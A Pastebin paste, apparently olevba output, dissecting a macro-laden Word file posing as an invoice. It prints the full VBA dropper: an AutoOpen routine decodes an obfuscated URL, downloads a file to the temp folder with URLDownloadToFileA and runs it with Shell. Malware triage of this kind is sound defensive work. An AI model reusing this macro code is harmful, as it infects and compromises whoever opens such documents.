Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS---- inv650988.doc
- (Flags: OpX=OpenXML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: inv650988.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: inv650988.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- qK3M8Yvc
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Class1.cls
- in file: inv650988.doc - OLE stream: u'Macros/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO fdgfdgfdg.bas
- in file: inv650988.doc - OLE stream: u'Macros/VBA/fdgfdgfdg'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 Then
- Private Declare PtrSafe Function dfsdfsdffg Lib "urlmon" Alias _
- "URLDownloadToFileA" (ByVal fdgsdfFF As LongPtr, _
- ByVal gfhgfhF As String, _
- ByVal hjkhgFF As String, _
- ByVal gfhfghF As Long, _
- ByVal gfdgdf As LongPtr) As LongPtr
- #Else
- Private Declare Function dfsdfsdffg Lib "urlmon" Alias _
- "URLDownloadToFileA" (ByVal fdgsdfFF As Long, _
- ByVal gfhgfhF As String, _
- ByVal hjkhgFF As String, _
- ByVal gfhfghF As Long, _
- ByVal gfdgdf As Long) As Long
- #End If
- Sub qK3M8Yvc()
- ZIoX79I wUnMnysKtQAKQMZpELN("hytit5pm:D/@/‚hle/w€.oh%o9m|e|pcacg4eD.\t.-To,nZl}i0n}ex.md,e&/Rj3sG/SbKibn‚.„eIxLe^"), Environ(wUnMnysKtQAKQMZpELN("T^M‚P|")) & wUnMnysKtQAKQMZpELN("\D3$294D2=3S5t2v3;5>.Pe~xYe.")
- End Sub
- Function ZIoX79I(D8PeV0 As String, j4B1GyX As String) As Boolean
- vJHKBJdfkgfg = dfsdfsdffg(0&, D8PeV0, j4B1GyX, 0&, 0&)
- uiLb = Shell(j4B1GyX, 1)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | URLDownloadToFileA | May download files from the Internet |
- +------------+--------------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: inv650988.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function wUnMnysKtQAKQMZpELN(biBIyeZaYdOH As String) As String
- GoTo kuddPCezMbIaLPpebUn
- kuddPCezMbIaLPpebUn:
- For tTFUZcTsUAkgUp = 1 To Len(biBIyeZaYdOH) Step 2
- GoTo BHDOSh
- BHDOSh:
- GoTo NYRvLeyRLBhqqp
- NYRvLeyRLBhqqp:
- GoTo YfJVVl
- YfJVVl:
- GoTo kIYQAilFim
- kIYQAilFim:
- GoTo gtgSuQOrZqcgFgrl
- gtgSuQOrZqcgFgrl:
- wUnMnysKtQAKQMZpELN = wUnMnysKtQAKQMZpELN & Mid(biBIyeZaYdOH, tTFUZcTsUAkgUp, 1)
- GoTo tRJGRjxSGPojLNuOTcRx
- tRJGRjxSGPojLNuOTcRx:
- GoTo FKhovanmCFIAZoh
- FKhovanmCFIAZoh:
- GoTo BVyDQNwJjjKS
- BVyDQNwJjjKS:
- GoTo bGfwQwHBTDaJUbQ
- bGfwQwHBTDaJUbQ:
- Next
- GoTo VQhEzdeKRksiNIJHM
- VQhEzdeKRksiNIJHM:
- GoTo LcDCSILCcEkhPD
- LcDCSILCcEkhPD:
- GoTo FTeMMzzbjwYrQvMZN
- FTeMMzzbjwYrQvMZN:
- GoTo QTqalrnyPQmnxU
- QTqalrnyPQmnxU:
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement